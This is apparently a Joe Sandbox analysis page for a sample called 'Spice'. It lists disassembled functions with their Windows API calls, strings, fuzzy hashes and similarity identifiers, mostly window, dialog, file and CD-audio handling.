Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: da4e97ae4106738aa515ac83c2d97c5edea95670d9d0feaaaa76ff98189b0cc0
Instruction ID: 917cf34316eee1a8c17118d99ae81272e51fce0e41d491093c82e8ffb97cfbc3
Opcode Fuzzy Hash: da4e97ae4106738aa515ac83c2d97c5edea95670d9d0feaaaa76ff98189b0cc0
Instruction Fuzzy Hash: DFA11371204216AFDB18DF64C986FEAB7E8FF04318F00551DF9A9E2191EB31E916CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ECBA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00ECBAB1
_wcscmp.LIBCMT ref: 00ECBAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 00ECBAEA
CharUpperBuffW.USER32(?,00000000), ref: 00ECBB07
_wcscmp.LIBCMT ref: 00ECBB25
_wcsstr.LIBCMT ref: 00ECBB36
GetClassNameW.USER32(00000018,?,00000400), ref: 00ECBB6E
_wcscmp.LIBCMT ref: 00ECBB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 00ECBBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 00ECBBEE
_wcscmp.LIBCMT ref: 00ECBBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 00ECBC26
GetWindowRect.USER32(00000004,?), ref: 00ECBC8F

Strings

ThumbnailClass, xrefs: 00ECBB79, 00ECBBF9
@, xrefs: 00ECBA92

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 4f669d903f337541adf08f5c2b6a4a437a10416469551f283a4d3449a9fd9a09
Instruction ID: aad8a70810bae7e851a35507160612781bc1835a56fea170bad79288a29c87fa
Opcode Fuzzy Hash: 4f669d903f337541adf08f5c2b6a4a437a10416469551f283a4d3449a9fd9a09
Instruction Fuzzy Hash: B481C2710043099BDB14DF14CA86FAABBE8FF44318F04A46DFD89AA096DB31DD46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00ECB8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00ECB915

Strings

[LAST, xrefs: 00ECB9C2
ACTIVE, xrefs: 00ECB8F0
[ALL, xrefs: 00ECB9BB
CLASSNAME=, xrefs: 00ECB952
REGEXP=, xrefs: 00ECB92A
LAST, xrefs: 00ECB8DA
[REGEXPTITLE:, xrefs: 00ECB93D
[HANDLE:, xrefs: 00ECB921
HANDLE=, xrefs: 00ECB90E
[ACTIVE, xrefs: 00ECB902
[CLASS:, xrefs: 00ECB965
ALL, xrefs: 00ECB9A9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: adbf4fcbb435de9d4293e27c56c872aabd123c3405bd794e07076a002b2ef8e3
Instruction ID: d5524df52c2685a262d6a7664765514abfe2d3174c91ceaea09688e435679fbb
Opcode Fuzzy Hash: adbf4fcbb435de9d4293e27c56c872aabd123c3405bd794e07076a002b2ef8e3
Instruction Fuzzy Hash: E231C130A40215A7CB14FB60EE43FED77F8AF20750F202129F549B10E6EF66AE069657

Uniqueness

Uniqueness Score: -1.00%

Function 00ECCB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00ECCBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ECCBBC
SetWindowTextW.USER32(?,?), ref: 00ECCBD3
GetDlgItem.USER32(?,000003EA), ref: 00ECCBE8
SetWindowTextW.USER32(00000000,?), ref: 00ECCBEE
GetDlgItem.USER32(?,000003E9), ref: 00ECCBFE
SetWindowTextW.USER32(00000000,?), ref: 00ECCC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ECCC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ECCC3F
GetWindowRect.USER32(?,?), ref: 00ECCC48
SetWindowTextW.USER32(?,?), ref: 00ECCCB3
GetDesktopWindow.USER32 ref: 00ECCCB9
GetWindowRect.USER32(00000000), ref: 00ECCCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ECCD0C
GetClientRect.USER32(?,?), ref: 00ECCD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ECCD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ECCD69

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: c558f25720944e14542c81fb8871da2d9000dfd442355271c060622d99924222
Instruction ID: 3a8ed11814607a8a858c5655b39ffa419632a4c16f5a86b0a555c5653ba8e435
Opcode Fuzzy Hash: c558f25720944e14542c81fb8871da2d9000dfd442355271c060622d99924222
Instruction Fuzzy Hash: 46516E70900709AFDB20DFA8CE85FAEBBF5FF44705F10091CE54AA25A0CB76A915DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EFA7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EFA87E
DestroyWindow.USER32(?,?), ref: 00EFA8F8

Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EFA972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EFA994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFA9A7
DestroyWindow.USER32(00000000), ref: 00EFA9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E70000,00000000), ref: 00EFAA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFAA19
GetDesktopWindow.USER32 ref: 00EFAA32
GetWindowRect.USER32(00000000), ref: 00EFAA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EFAA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EFAA69

Part of subcall function 00E729AB: GetWindowLongW.USER32(?,000000EB), ref: 00E729BC

Strings

tooltips_class32, xrefs: 00EFA96B, 00EFA9F9
0, xrefs: 00EFA894

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 4d6b2178f785081fa1838548c1207f13802f8dba8808b87cca5dbde0876deee5
Instruction ID: 5e51524041d7361cbf3b0a64c3400e46f1f7cca4f795d8cb43de47c3af38d26f
Opcode Fuzzy Hash: 4d6b2178f785081fa1838548c1207f13802f8dba8808b87cca5dbde0876deee5
Instruction Fuzzy Hash: A1719DB0140208AFD721DF28CC49F7677E6FB88304F58052DFA89AB2A1DB71E915DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EFCCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3

DragQueryPoint.SHELL32(?,?), ref: 00EFCCCF

Part of subcall function 00EFB1A9: ClientToScreen.USER32(?,?), ref: 00EFB1D2
Part of subcall function 00EFB1A9: GetWindowRect.USER32(?,?), ref: 00EFB248
Part of subcall function 00EFB1A9: PtInRect.USER32(?,?,00EFC6BC), ref: 00EFB258

SendMessageW.USER32(?,000000B0,?,?), ref: 00EFCD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EFCD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EFCD66
_wcscat.LIBCMT ref: 00EFCD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EFCDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 00EFCDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCDFF
DragFinish.SHELL32(?), ref: 00EFCE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EFCEF9

Strings

@GUI_DRAGID, xrefs: 00EFCE71
@GUI_DROPID, xrefs: 00EFCE26
@GUI_DRAGFILE, xrefs: 00EFCEA8

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 83b5a80a297e085660f3ae726a075fa832016b4164f6d4c30306c16b68dfb3a3
Instruction ID: 507f3fe4ccde8feeb221237a739ba68437f020070170780e666b3efbf031d030
Opcode Fuzzy Hash: 83b5a80a297e085660f3ae726a075fa832016b4164f6d4c30306c16b68dfb3a3
Instruction Fuzzy Hash: 24616D71108305AFC711EF50DC85EAFBBE9FF88350F100A1DF699A21A1DB719A49DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00ED82D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00ED831A
VariantCopy.OLEAUT32(00000000,?), ref: 00ED8323
VariantClear.OLEAUT32(00000000), ref: 00ED832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00ED841D
__swprintf.LIBCMT ref: 00ED844D
VarR8FromDec.OLEAUT32(?,?), ref: 00ED8479
VariantInit.OLEAUT32(?), ref: 00ED852A
SysFreeString.OLEAUT32(?), ref: 00ED85BE
VariantClear.OLEAUT32(?), ref: 00ED8618
VariantClear.OLEAUT32(?), ref: 00ED8627
VariantInit.OLEAUT32(00000000), ref: 00ED8665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00ED8447
Default, xrefs: 00ED84DA

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 72e8c48f2943e2c5963b741084c1de706407cd999f8f10cef9e6a3c71db805d0
Instruction ID: 55eccd96eb6e3ded8c73bb96ccd5efdf4d1a79d9b87beac44bfbe69a6954c8dc
Opcode Fuzzy Hash: 72e8c48f2943e2c5963b741084c1de706407cd999f8f10cef9e6a3c71db805d0
Instruction Fuzzy Hash: 41D1CC71604515EFDB249F65D984BAEB7B8FF04B00F24A156E419BB380DF30E942DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF49CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00EF4A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EF4AAC

Strings

COLLAPSE, xrefs: 00EF4AF2
CHECK, xrefs: 00EF4ACC
GETITEMCOUNT, xrefs: 00EF4B8E
ISCHECKED, xrefs: 00EF4C2F
GETTEXT, xrefs: 00EF4BFF
EXISTS, xrefs: 00EF4B15
SELECT, xrefs: 00EF4C5D
GETTOTALCOUNT, xrefs: 00EF4A93
UNCHECK, xrefs: 00EF4C88
EXPAND, xrefs: 00EF4B5E
GETSELECTED, xrefs: 00EF4BBC

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: f7696a5ed39ca788aa3bc9bbfc200d149968b5443a1419050fcd3c18fd5a86cf
Instruction ID: 4d0c41d1e5019bea16126c85c9d05cdc28a6de62df3c8f3d2e19156dcbd7112d
Opcode Fuzzy Hash: f7696a5ed39ca788aa3bc9bbfc200d149968b5443a1419050fcd3c18fd5a86cf
Instruction Fuzzy Hash: 52916CB02046159FCB14EF20C451A6EB7E1AF94354F14A85CF99A6B3E2DB31ED4ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 00EDE25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00EDE31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 00EDE32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EDE33B
__wsplitpath.LIBCMT ref: 00EDE399
_wcscat.LIBCMT ref: 00EDE3B1
_wcscat.LIBCMT ref: 00EDE3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EDE3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00EDE3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 00EDE41E
SetCurrentDirectoryW.KERNEL32(?), ref: 00EDE43F
_wcscpy.LIBCMT ref: 00EDE44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EDE48A

Strings

*.*, xrefs: 00EDE445

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: e958b7833b13affaef4fd6ef3840cc6b7e6a621de4caca588a0b4ad65e84e2a5
Instruction ID: 4b80b82b3f4f9855e397f158b7e7fdaba1401cf08fa478cb481b36a7eb702b38
Opcode Fuzzy Hash: e958b7833b13affaef4fd6ef3840cc6b7e6a621de4caca588a0b4ad65e84e2a5
Instruction Fuzzy Hash: E5615AB25043059FCB10EF60C845A9EB3E8FF89314F04991EF999AB351DB35E946CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EDA2C2

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00EDA2E3
__swprintf.LIBCMT ref: 00EDA33C
__swprintf.LIBCMT ref: 00EDA355
_wprintf.LIBCMT ref: 00EDA3FC
_wprintf.LIBCMT ref: 00EDA41A

Strings

"%s" (%d) : ==> %s:, xrefs: 00EDA415
Incorrect parameters to object property !, xrefs: 00EDA39E
"%s" (%d) : ==> %s:%s%s, xrefs: 00EDA3F7
Error: , xrefs: 00EDA3C4
Line %d (File "%s"):, xrefs: 00EDA336, 00EDA34F
^ ERROR , xrefs: 00EDA391

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 3325b7fbee216fa630b38b1970d04a8391d56498ef62d9ccf3f4a5163f516701
Instruction ID: 3d9ee752c9d708a5ac2f583756934ec65e4669627f9d7b88d4af66cb06084fe4
Opcode Fuzzy Hash: 3325b7fbee216fa630b38b1970d04a8391d56498ef62d9ccf3f4a5163f516701
Instruction Fuzzy Hash: A851B071800219AACF14FBE0DD46EEEB7B9EF04340F1401A6F408B2162DB316F46EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00EBF8B8,00000001,0000138C,00000001,00000000,00000001,?,00EE3FF9,00000000), ref: 00ED009A
LoadStringW.USER32(00000000,?,00EBF8B8,00000001), ref: 00ED00A3

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

GetModuleHandleW.KERNEL32(00000000,00F37310,?,00000FFF,?,?,00EBF8B8,00000001,0000138C,00000001,00000000,00000001,?,00EE3FF9,00000000,00000001), ref: 00ED00C5
LoadStringW.USER32(00000000,?,00EBF8B8,00000001), ref: 00ED00C8
__swprintf.LIBCMT ref: 00ED0118
__swprintf.LIBCMT ref: 00ED0129
_wprintf.LIBCMT ref: 00ED01D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ED01E9

Strings

Error: , xrefs: 00ED01A0
Line %d (File "%s"):, xrefs: 00ED0112
^ ERROR, xrefs: 00ED017E
Line %d:, xrefs: 00ED0123
%s (%d) : ==> %s: %s %s, xrefs: 00ED01CD

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: c71b24f4ba1866168f935625f1460d23e7395d8c507b496b652ca000222f0bb1
Instruction ID: 9dd245d34c0c6eb69ee753edbb6c76d72f112770bbd8a50d046bf0f6931d94ab
Opcode Fuzzy Hash: c71b24f4ba1866168f935625f1460d23e7395d8c507b496b652ca000222f0bb1
Instruction Fuzzy Hash: 52415E72800219AACF14FBE0DD86EEEB7BDEF54340F501195F509B2192EA356F0ADB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC

CharLowerBuffW.USER32(?,?), ref: 00EDAA0E
GetDriveTypeW.KERNEL32 ref: 00EDAA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDAAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDAADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDAB08

Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B

Strings

type cdaudio alias cd wait, xrefs: 00EDAA86
close cd wait, xrefs: 00EDAAF3
closed, xrefs: 00EDAA22, 00EDAA2B
open, xrefs: 00EDAA35
close, xrefs: 00EDAA14
set cd door , xrefs: 00EDAAA9
open , xrefs: 00EDAA6A
wait, xrefs: 00EDAAC5

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: d2454019100d95f0aa331bd4eb5a40280b694dfb6b7ca835368b931441977791
Instruction ID: e6dd637abfedb0e01ecda85cc42a3f746e18134801d75c8d431ceb4c40aff783
Opcode Fuzzy Hash: d2454019100d95f0aa331bd4eb5a40280b694dfb6b7ca835368b931441977791
Instruction Fuzzy Hash: 35519D711043049FC704EF10D88196AB7F8FF88758F1499ADF899A72A1DB31EE06CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EDA852
__swprintf.LIBCMT ref: 00EDA874
CreateDirectoryW.KERNEL32(?,00000000), ref: 00EDA8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EDA8D6
_memset.LIBCMT ref: 00EDA8F5
_wcsncpy.LIBCMT ref: 00EDA931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EDA966
CloseHandle.KERNEL32(00000000), ref: 00EDA971
RemoveDirectoryW.KERNEL32(?), ref: 00EDA97A
CloseHandle.KERNEL32(00000000), ref: 00EDA984

Strings

\, xrefs: 00EDA88A
:, xrefs: 00EDA895
\??\%s, xrefs: 00EDA86E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: b59d65b9fd4078c13eeee381fca7e1ad1b1b56f750486b85243b6db797ea0002
Instruction ID: 684a6465b0d5b29ecc89bb0e81d331f6b454741ba37388d970f1368d17655684
Opcode Fuzzy Hash: b59d65b9fd4078c13eeee381fca7e1ad1b1b56f750486b85243b6db797ea0002
Instruction Fuzzy Hash: 3931A17190021AABDB219FA0DC49FEB73BCFF89700F1451B6F908E6160EB7097459B25

Uniqueness

Uniqueness Score: -1.00%

